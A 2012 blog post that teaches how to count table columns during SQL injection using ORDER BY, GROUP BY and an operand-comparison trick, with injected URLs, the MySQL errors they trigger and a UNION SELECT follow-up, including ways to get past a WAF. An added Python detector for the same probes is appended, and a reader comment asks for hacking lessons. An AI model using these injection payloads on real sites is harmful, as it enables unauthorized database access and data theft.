Tuesday, November 20, 2012

Counting Columns in SQLi

Hi there.
As we already know, the most common way to count the number of columns in a SQL injection attack is with an ORDER BY query.
For example:

http://example.org/news.php?id=8 order by 5--
If the page loads normally, the number of columns is still within the range of 5.

http://example.org/news.php?id=8 order by 6--
Otherwise, if the number exceeds the column count, an error will appear, and it usually looks like this:
Unknown column '6' in 'order clause'
From here we know that the number of columns is 5, and we can proceed with the SQLi.

http://example.org/news.php?id=-8 union select 1,2,3,4,5--
And so on.

But if you encounter a scenario where you can't use ORDER BY because of a WAF or some related reason, there are still other ways to count the columns.

1 - Use a GROUP BY query

This is similar to the ORDER BY technique, but instead of ORDER BY we use GROUP BY.

http://example.org/news.php?id=8 group by 5--
If the page loads normally, the number of columns is still within the range of 5.

http://example.org/news.php?id=8 group by 6--
Otherwise, if the number exceeds the column count, an error will appear, and it usually looks like this:
Unknown column '6' in 'group statement'

Another way is:

2 - Set a condition such as (the main query) = (select 1)
For example:

http://example.org/news.php?id=8 and (select * from news)=(select 1)
Here we try to count the number of columns (using *) from an available table (news),
and the error message shows the number of columns, like this:
Operand should contain 5 column(s)
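
The three probes described above leave recognizable traces in request logs and in MySQL error output. The following Python detector is an added example, not code from the original post; the function and pattern names, the (client, query string) input shape and the sample requests are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Request-side patterns for the three column-counting probes in the post.
REQUEST_PROBES = {
    "order_by_index": re.compile(r"\border\s+by\s+(\d+)", re.I),
    "group_by_index": re.compile(r"\bgroup\s+by\s+(\d+)", re.I),
    "operand_compare": re.compile(
        r"\(\s*select\s+\*\s+from\s+\w+\s*\)\s*=\s*\(\s*select\s+\d+\s*\)", re.I),
}
# Response-side: the MySQL error texts quoted in the post.
ERROR_RX = re.compile(
    r"Unknown column '\d+' in '(?:order clause|group statement)'"
    r"|Operand should contain \d+ column\(s\)")

def normalize(query):
    """URL-decode (up to 3 rounds) and collapse runs of whitespace."""
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return re.sub(r"\s+", " ", query)

def scan(requests):
    """Map client -> probe names seen; add 'index_walk' when one client
    tries two or more distinct ORDER BY / GROUP BY positions."""
    hits, positions = defaultdict(set), defaultdict(set)
    for client, query in requests:
        q = normalize(query)
        for name, rx in REQUEST_PROBES.items():
            m = rx.search(q)
            if m:
                hits[client].add(name)
                if rx.groups:  # only the positional probes capture a number
                    positions[client].add(int(m.group(1)))
    for client, seen in positions.items():
        if len(seen) >= 2:
            hits[client].add("index_walk")
    return dict(hits)

# Constructed sample input, not taken from a real log.
SAMPLE_REQUESTS = [
    ("203.0.113.7", "id=8%20order%20by%205--"),
    ("203.0.113.7", "id=8+GROUP+BY+6--"),
    ("203.0.113.7", "id=8%20and%20(select%20*%20from%20news)=(select%201)"),
    ("198.51.100.2", "id=8&sort=date"),
]
```

Running scan(SAMPLE_REQUESTS) flags only the first client, and ERROR_RX can be applied line by line to an application or database error log to catch the same probes from the response side.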

Thanks,
@yappare a.k.a p0pc0rn

1 comment:

Jackzack said...

Hello there,

I am a newbie in hf. Just followed you from there :p. I try some challenges in SQLi and XSS but no luck :(. Wonder if you can teach me smt about that. If you are willing to do so, PM me in hf
ID:jackzack

Best!